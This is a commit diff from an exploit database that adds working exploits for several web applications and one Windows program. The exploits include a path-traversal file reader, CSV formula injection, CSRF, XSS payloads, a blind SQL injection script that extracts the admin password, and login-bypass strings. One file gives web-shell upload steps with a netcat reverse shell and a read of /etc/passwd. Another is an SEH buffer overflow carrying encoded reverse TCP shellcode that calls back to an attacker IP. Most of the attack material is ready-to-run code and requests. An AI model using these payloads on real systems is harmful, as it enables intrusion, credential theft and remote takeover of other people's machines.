DB: 2020-12-02

18 changes to exploits/shellcodes

10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)
EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path
Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path
Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path
Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path
TypeSetter 5.1 - CSRF (Change admin e-mail)
Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
Online Shopping Alphaware 1.0 - Error Based SQL injection
Pharmacy/Medical Store & Sale Point 1.0  - 'email' SQL Injection
Setelsa Conacwin 3.7.1.2 - Local File Inclusion
Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS
Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution
LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting
Medical Center Portal Management System 1.0 - 'login' SQL Injection
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020
Social Networking Site - Authentication Bypass (SQli)
Tendenci 12.3.1 - CSV/ Formula Injection
This commit is contained in:
Offensive Security 2020-12-02 05:01:55 +00:00
parent 216721f32c
commit 4b9e53700f
19 changed files with 964 additions and 0 deletions

View file

@ -0,0 +1,29 @@
# Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion
# Date: 02/09/20
# Exploit Author: Bryan Rodriguez Martin AKA tr3mb0
# Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/
# Version: 3.7.1.2
# Tested on: Windows
# FIX: The recommendation from the vendor is to update to the last version.
import requests
import urllib.parse
import colorama
from colorama import Fore, Style
ENDPOINT = "http://10.4.8.11:8081/"
while True:
cmd = input(Fore.RED + "[*] FILE >> ")
print(Style.RESET_ALL)
#cmd = urllib.parse.quote(cmd)
ENDPOINT2 = ENDPOINT + "..%2F..%2F" + cmd
print("[*] Target >> " + ENDPOINT2)
print(" ")
r = requests.get(url = ENDPOINT2)
extract = r.text
print(extract)

View file

@ -0,0 +1,21 @@
#Exploit Title: Tendenci 12.3.1 - CSV/ Formula Injection
#Date: 2020-10-29
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://www.tendenci.com/
#Software Link: https://github.com/tendenci/tendenci
#Version: 12.3.1
#Payload: =10+20+cmd|' /C calc'!A0
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
Contact Us feature in Tendenci v12.3.1 via message field that is mistreated
while exporting to a CSV file.
To exploit this vulnerability:
1. Go to contact us page and enter the payload "=10+20+cmd|' /C
calc'!A0" in the message field and submit the form
2. Login to the application and go to Forms section and export the
contact us form entries
3. Click on Export and save the CSV file downloaded
4. Open the CSV file, allow all popups and our payload is executed
(calculator is opened).

View file

@ -0,0 +1,68 @@
# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail)
# Exploit Author: Alperen Ergel
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Kali & ubuntu
# Category: WebApp
######## Description ########
Attacker can change admin e-mail address
## Vulnerable
- Go to the admin page view preferences
- Change the e-mail address
######## Proof of Concept ########
===> REQUEST <====
POST /typesetter/Admin/Preferences HTTP/1.1
Host: http://localhost/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 237
Origin: http://localhost/
Connection: close
Referer: http://localhost/typesetter/Admin/Preferences
## < SNIPP >
verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c
&email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save
#### Attack Code ####
<html>
<body>
<form action="http://localhost/typesetter/Admin/Preferences" method="POST">
<input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" />
<input type="hidden" name="email" value="[CHANGE HERE]" />
<input type="hidden" name="oldpassword" value="" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="password1" value="" />
<input type="hidden" name="algo" value="password&#95;hash" />
<input type="hidden" name="cmd" value="changeprefs" />
<input type="hidden" name="aaa" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

View file

@ -0,0 +1,32 @@
# Exploit Title: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
# Google Dork: inurl:''com_gmapfp''
# Date: 2020-03-27
# Exploit Author: ThelastVvV
# Vendor Homepage: https://gmapfp.org/
# Version:Version J3.5 /J3.5free
# Tested on: Ubuntu
# CVE: CVE-2020-23972
# Description:
An attacker can access the upload function of the application without authenticating to the application and also can upload files due the issues of unrestricted file uploads which can be bypassed by changing the content-type and name file too double extensions
# PoC:
Version J3.5
http://127.0.0.1/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
-Once the attacker can locate the unauthenticated file upload form then the attacker can bypass the restriction by changing content-type and name file double extensions file.html.gif then can open file.html
# Impact
the attacker can upload malicious files can cause defacement of the site or uploading large amount of file til causes denial of service attack to Webapp/Server
# Dir File Path:
http://127.0.0.1///images/stories/gmapfp/test.html.gif
http://127.0.0.1///images/stories/gmapfp/test.html
http://127.0.0.1///images/gmapfp/test2.html.gif
http://127.0.0.1///images/gmapfp/test2.html.gif
# Issues are fixed,Please update to Last Version

80
exploits/php/webapps/49130.py Executable file
View file

@ -0,0 +1,80 @@
# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
# Date: 27.11.2020
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
# Vendor Homepage: https://www.myeventon.com/
# Version: 3.0.5
# Tested on: Ubuntu 18.04
# CVE : 2020-29395
# Description Link:
https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
"""
~ VULNERABLITY DETAILS ~
https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
#
WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected
into the search field.
#
The following python code will inject javascript code and print out url that will be sent to victim.
If you use unicode caracters for xss , exploit will print page source.
##USAGE##
$ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'
##OUTPUT##
[+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
"""
import requests
import sys
import argparse
from colorama import Fore
def vuln_reflected(url, payload):
s = requests.Session()
get_request = s.get(url+payload)
if get_request.status_code == 500:
print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")
else:
content_result = str(get_request.content)
search_find = content_result.find(payload)
if search_find != -1:
print(Fore.GREEN+"[+] "+str(url)+str(payload))
else:
print(content_result)
def main():
desc = "Wordpress EventON Calendar Plugin XSS"
parser = argparse.ArgumentParser(description=desc)
exp_option = parser.add_argument_group('')
parser.add_argument("--exploit", help ="", action='store_true')
parser.add_argument("--url",help="", type=str, required=False)
parser.add_argument("--payload",help="",type=str,required=False)
args = parser.parse_args()
if args.exploit:
if args.url:
if args.payload:
url = args.url
payload = args.payload
vuln_reflected(url, payload)
if name == 'main':
main()

View file

@ -0,0 +1,11 @@
# Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection
# Exploit Author: Moaaz Taha (0xStorm)
# Date: 2020-08-20
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
# Description
This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases.
#POC
sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10

83
exploits/php/webapps/49132.py Executable file
View file

@ -0,0 +1,83 @@
# Exploit Title: Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection
# Date: 2020-08-23
# Exploit Author: @naivenom
# Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework
# Version: 1.0
# Tested on: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
This parameter "email" is vulnerable to Time-Based blind SQL injection
in this path "/medical/login.php " that leads to retrieve all
databases.
#exploit
import re
import requests
from bs4 import BeautifulSoup
import sys
import urllib3
import time
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# We can test the time based blind sqli with this script. This script
testing with each character of the password column from users name
table
# and retrieve password from admin user.
def time_based_blind_sqli(injection_string):
target = "http://localhost:81/medical-store-source/login.php"
for j in range(32,126):
data = {'email': "%s" % (injection_string.replace("[CHAR]", str(j))),
'password':'xJXb',
'login':''}
tim = time.time()
r = requests.post(target,data = data, verify=False)
nowtime = time.time()
curren = nowtime-tim
if curren <= 4:
return j
return None
def main():
print("\n(+) Retrieving password from admin user...")
# 5 is length of the password. This can
# be dynamically stolen from the database as well!
for i in range(1,5):
injection_string = "admin@admin.com' AND (SELECT 1100 FROM
(SELECT(SLEEP(4-(IF(ORD(MID((SELECT IFNULL(CAST(password AS
NCHAR),0x20) FROM store.users ORDER BY password LIMIT
0,1),%d,1))>[CHAR],0,1)))))soLu) AND 'yHIV'='yHIV" % i
extracted_char = chr(time_based_blind_sqli(injection_string))
sys.stdout.write(extracted_char)
sys.stdout.flush()
print("\n(+) done!")
if __name__ == "__main__":
main()

View file

@ -0,0 +1,115 @@
# Exploit Title: Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS
# Date: 01-11-2020
# Exploit Author: yunaranyancat
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
# Version: 1.0
# Tested on: Ubuntu 18.04 + XAMPP 7.4.11
Summary:
Multiple Persistent Cross-site Scripting in Multi Restaurant Table Reservation System allows attacker to gain sensitive information using these vulnerabilities.
# POC No.1
Persistent XSS vulnerability at /dashboard/profile.php triggered by adding payload in Restaurant Name field
### Sample request POC #1
POST /TableReservation/dashboard/profile.php HTTP/1.1
Host: [TARGET URL/IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[TARGET URL/IP]/TableReservation/dashboard/profile.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Cookie: PHPSESSID=0095837d1f0f69aa6c35a0bf2f70193c
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
fullname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&email=lol%40lol&phone=123456789&area=1&address=lol&password=lol&save=Save
# POC No.2
Persistent XSS vulnerability at /dashboard/table-list.php triggered by adding payload in Table Name field in table-add.php
### Sample request POC #2
POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
Host: [TARGET URL/IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[TARGET URL/IP]/TableReservation/dashboard/table-add.php
Content-Type: multipart/form-data; boundary=---------------------------424640138424818065256966622
Content-Length: 321
Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------424640138424818065256966622
Content-Disposition: form-data; name="tablename"
<script>alert("XSS")</script>
-----------------------------424640138424818065256966622
Content-Disposition: form-data; name="addtable"
Add Table
-----------------------------424640138424818065256966622--
# POC No. 3
Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Item Name field in menu-add.php
# POC No. 4
Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Made by field in menu-add.php
# POC No. 5
Persistent XSS vulnerability at /dashboard/menu-list.php triggered by modifying value of Area(food_type) dropdown to XSS payload in menu-add.php
### Sample request POC #3, #4 & #5
POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
Host: [TARGET URL/IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[TARGET URL/IP]/TableReservation/dashboard/menu-add.php
Content-Type: multipart/form-data; boundary=---------------------------165343425917898292661480081499
Content-Length: 6641
Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="itemname"
<script>alert("XSS1")</script>
-----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="price"
1
-----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="madeby"
<svg onload=alert("XSS2")>
-----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="food_type"
<svg onload=prompt("XSS4")>
-----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="image"; filename="image.jpeg"
Content-Type: image/jpeg
..
[REDACTED CONTENT OF image.jpeg]
..
----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="addItem"
Add Item
-----------------------------165343425917898292661480081499--

View file

@ -0,0 +1,28 @@
# Exploit Title: Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-09-18
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS
Step 1: Log in to the CMS with any valid user credentials.
Step 2: Select Measurement Settings and click on "Set Measurement Parts".
Step 3: Create any php payload on locally on your system. ( i used the default php webshell in /usr/share/webshells/php/php-reverse-shell.php)
Step 4: Fill the required details and upload the php payload you created using the image upload field.
Step 5: Select Measurement Settings and click on "View/Edit Measurement Parts".
Step 6: Start netcat listener.
Step 7: Use the search filter to find your measurement and click on "edit" to trigger the php payload.
========================== OR ==========================
Step 1: Embed an image with the code "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg"
Step 2: Rename the malicious image to have include a ".php" extention. Example ( mv r0b0t.jpg r0b0t.jpg.php )
Step 3: Log in to the CMS with any valid user credentials.
Step 4: Select Measurement Settings and click on "Set Measurement Parts".
Step 5: Fill the required details and upload malicious image you created using the image upload field.
Step 6: Select Measurement Settings and click on "View/Edit Measurement Parts".
Step 7: Use the search filter to find your measurement and click on "edit" to edit details.
Step 8: Righ click on the broken image and copy image location.
Step 9: Paste image location in browser and you will have RCE. ( http://localhost/img/part/r0b0t.jpg.php?cmd=cat /etc/passwd )

View file

@ -0,0 +1,40 @@
# Exploit Title: LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting
# Date: 19-11-2020
# Exploit Author: Sagar Banwa
# Vendor Homepage: https://lepton-cms.org/
# Software Link: https://lepton-cms.org/english/download/archive.php
# Version: 4.7.0
# Tested on: Windows 10/Kali Linux
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
Vulnerable Parameters: Pages URL.
Steps-To-Reproduce:
1. Login to the Admin Account
2. Go to the Menu-Pages-Pages Overview.
3. Now edit any page
4. Put the below payload in the url input box.
5.ex. https://localhost/_packinstall/"onmouseover=prompt(/xss/)>
POST /LEPTONmvkzycfafg/modules/wrapper/save.php?leptoken=a8274f4a99bb3c2d1d857z1606411062 HTTP/1.1
Host: localhost
Connection: close
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localhost/LEPTONmvkzycfafg/backend/pages/modify.php?page_id=1&leptoken=33bfc986e094ce5dd7655z1606411059
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: lep5031sessionid=75627dd11a0e789c4e560f7a93cd3153
page_id=1&section_id=1&url=https%3A%2F%2Flocalhost%2F_packinstall%2F%22onmouseover%3Dprompt%28%2Fxss%2F%29%3E+&height=900

View file

@ -0,0 +1,31 @@
# Exploit Title: Medical Center Portal Management System 1.0 - 'login' SQL Injection
# Dork: N/A
# Date: 2020-11-26
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
# Version: 1.0
# Category: Webapps
# Tested on: Kali Linux
# POC:
# 1)
# http://localhost/medic/pages/login.php
#
POST /medic/pages/processlogin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://localhost
Connection: close
Referer: http://localhost/medic/pages/login.php
Cookie: PHPSESSID=ef7226c5aa187ed19ce1815df30e079e
Upgrade-Insecure-Requests: 1
user=1%27+or+1%3D1%23&password=1%27+or+1%3D1%23&btnlogin=

View file

@ -0,0 +1,110 @@
# Exploit Title: Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities
# Date: 11-14-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 749
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Edit OS" functionality of Pandora FMS.
# Vulnerable Parameters : name, description
# Patch Link : https://github.com/pandorafms/pandorafms/commit/58f521e8b570802fa33c75f99586e5b01b06731b
#POC
POST /pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1
name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&icon=0&id_os=0&action=save&update_button=Create
############################################################################################################
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Private Enterprise Numbers" functionality of Pandora FMS.
# Vulnerable Parameters : manufacturer, description
# Patch Link : https://github.com/pandorafms/pandorafms/commit/b9b94e1382f6e340fd9f3136972cca4373f00eb0
#POC
POST /pandora_console/ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------195778570630678476283866516641
Content-Length: 846
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=templates&sec2=godmode/modules/private_enterprise_numbers
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="is_new"
1
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="page"
godmode/modules/private_enterprise_numbers
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="method"
add
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="pen"
123
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="manufacturer"
<img src=a onerror=alert(1)>
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="description"
<img src=a onerror=alert(1)>
-----------------------------195778570630678476283866516641--
############################################################################################################
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Module Template Management" functionality of Pandora FMS.
# Vulnerable Parameters : name, description
# Patch Link : https://github.com/pandorafms/pandorafms/commit/e833c318a5a91d6d709a5b266c1245261b4c0e70
# POC
POST /pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1
id_np=0&valid-pen=1%2C2%2C4%2C9%2C11%2C63%2C111%2C116%2C123%2C171%2C173%2C188%2C207%2C674%2C2021%2C2636%2C3375%2C3861%2C6486%2C6574%2C8072%2C10002%2C12356%2C13062%2C14988%2C19464%2C41112%2C52627%2C53526%2C&name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&pen=&action_button=Create

View file

@ -0,0 +1,30 @@
# Exploit Title: Social Networking Site - Authentication Bypass (SQli)
# Date: 2020-11-17
# Exploit Author: gh1mau
# Email: gh1mau.rulez@gmail.com
# Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://www.sourcecodester.com/php/14601/social-networking-site-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14601&title=Social+Networking+Site+in+PHP%2FMySQLi+with+Full+Source+Code
# Software Release Date: November 17, 2020
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)
Vulnerable File:
----------------
/signin_form.php
Vulnerable Code:
-----------------
Entry point:
line 7: $email=$_POST['email'];
line 8: $password=$_POST['password'];
Exit point:
line 10: $result = mysqli_query($con,"SELECT * FROM user WHERE email = '$email' and password='$password'");
Vulnerable Issue:
-----------------
Attacker could bypass the authentication using simple sqli login bypass payload
username: gh1mau@gh1mau.com
password: ' or '1'='1

92
exploits/windows/local/49134.py Executable file
View file

@ -0,0 +1,92 @@
# Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)
# Date: 2020-09-02
# Exploit Author: Sectechs
# Vendor Homepage: https://www.10-strike.com
# Version: 8.65
# Tested on: Windows 7 x86 SP1
import os
import sys
import struct
import socket
crash ="A"* 209
# jmp short 8
# kali@root:msf-nasm_shell
# nasm> jmp short 8
Next_SE_Pointer = "\xeb\x06\x90\x90"
# 61e8497a
SE_Handler="\x7a\x49\xe8\x61"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed
payload = (
"\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
"\x6c\x59\x78\x6d\x52\x43\x30\x53\x30\x75\x50\x33\x50\x4f\x79"
"\x69\x75\x34\x71\x69\x50\x32\x44\x4e\x6b\x32\x70\x64\x70\x6c"
"\x4b\x76\x32\x54\x4c\x4e\x6b\x31\x42\x66\x74\x6c\x4b\x72\x52"
"\x74\x68\x44\x4f\x48\x37\x42\x6a\x34\x66\x76\x51\x79\x6f\x6c"
"\x6c\x77\x4c\x65\x31\x53\x4c\x74\x42\x64\x6c\x77\x50\x39\x51"
"\x38\x4f\x74\x4d\x66\x61\x38\x47\x59\x72\x48\x72\x52\x72\x63"
"\x67\x6c\x4b\x66\x32\x56\x70\x6c\x4b\x43\x7a\x45\x6c\x6c\x4b"
"\x30\x4c\x76\x71\x43\x48\x4b\x53\x62\x68\x45\x51\x4b\x61\x43"
"\x61\x4c\x4b\x73\x69\x57\x50\x37\x71\x68\x53\x4e\x6b\x52\x69"
"\x36\x78\x6d\x33\x46\x5a\x43\x79\x4e\x6b\x35\x64\x4c\x4b\x77"
"\x71\x5a\x76\x75\x61\x6b\x4f\x4e\x4c\x4b\x71\x58\x4f\x46\x6d"
"\x65\x51\x5a\x67\x66\x58\x79\x70\x63\x45\x6a\x56\x75\x53\x63"
"\x4d\x6c\x38\x45\x6b\x53\x4d\x54\x64\x32\x55\x4b\x54\x52\x78"
"\x6e\x6b\x71\x48\x71\x34\x77\x71\x5a\x73\x55\x36\x6e\x6b\x56"
"\x6c\x50\x4b\x4e\x6b\x50\x58\x55\x4c\x36\x61\x78\x53\x6c\x4b"
"\x54\x44\x4e\x6b\x65\x51\x5a\x70\x6d\x59\x71\x54\x36\x44\x67"
"\x54\x73\x6b\x51\x4b\x51\x71\x50\x59\x50\x5a\x62\x71\x79\x6f"
"\x4b\x50\x73\x6f\x51\x4f\x63\x6a\x4e\x6b\x55\x42\x58\x6b\x4e"
"\x6d\x53\x6d\x45\x38\x65\x63\x74\x72\x35\x50\x55\x50\x53\x58"
"\x62\x57\x31\x63\x37\x42\x61\x4f\x36\x34\x33\x58\x32\x6c\x53"
"\x47\x31\x36\x73\x37\x4b\x4f\x49\x45\x68\x38\x4c\x50\x56\x61"
"\x33\x30\x57\x70\x44\x69\x68\x44\x76\x34\x30\x50\x32\x48\x67"
"\x59\x6d\x50\x50\x6b\x73\x30\x39\x6f\x59\x45\x32\x70\x72\x70"
"\x72\x70\x70\x50\x71\x50\x52\x70\x31\x50\x70\x50\x33\x58\x6a"
"\x4a\x36\x6f\x49\x4f\x6b\x50\x69\x6f\x38\x55\x4a\x37\x33\x5a"
"\x43\x35\x43\x58\x4f\x30\x6f\x58\x66\x66\x4e\x33\x73\x58\x46"
"\x62\x35\x50\x32\x35\x4c\x73\x6d\x59\x38\x66\x62\x4a\x72\x30"
"\x50\x56\x36\x37\x71\x78\x7a\x39\x59\x35\x42\x54\x35\x31\x79"
"\x6f\x4b\x65\x4b\x35\x39\x50\x52\x54\x54\x4c\x69\x6f\x30\x4e"
"\x47\x78\x52\x55\x38\x6c\x61\x78\x4c\x30\x58\x35\x79\x32\x33"
"\x66\x79\x6f\x4a\x75\x72\x48\x35\x33\x52\x4d\x71\x74\x53\x30"
"\x4d\x59\x59\x73\x51\x47\x50\x57\x70\x57\x75\x61\x78\x76\x33"
"\x5a\x76\x72\x73\x69\x51\x46\x48\x62\x6b\x4d\x70\x66\x6b\x77"
"\x47\x34\x57\x54\x37\x4c\x57\x71\x46\x61\x6e\x6d\x32\x64\x46"
"\x44\x44\x50\x79\x56\x65\x50\x37\x34\x73\x64\x56\x30\x52\x76"
"\x33\x66\x62\x76\x67\x36\x32\x76\x42\x6e\x56\x36\x32\x76\x62"
"\x73\x43\x66\x45\x38\x51\x69\x78\x4c\x37\x4f\x6b\x36\x49\x6f"
"\x58\x55\x4c\x49\x39\x70\x62\x6e\x73\x66\x71\x56\x39\x6f\x76"
"\x50\x55\x38\x35\x58\x6c\x47\x47\x6d\x45\x30\x79\x6f\x69\x45"
"\x6d\x6b\x78\x70\x6c\x75\x4c\x62\x73\x66\x35\x38\x69\x36\x7a"
"\x35\x6d\x6d\x4d\x4d\x39\x6f\x5a\x75\x67\x4c\x67\x76\x51\x6c"
"\x45\x5a\x4f\x70\x69\x6b\x39\x70\x54\x35\x36\x65\x6d\x6b\x33"
"\x77\x56\x73\x43\x42\x30\x6f\x72\x4a\x65\x50\x62\x73\x49\x6f"
"\x68\x55\x41\x41")
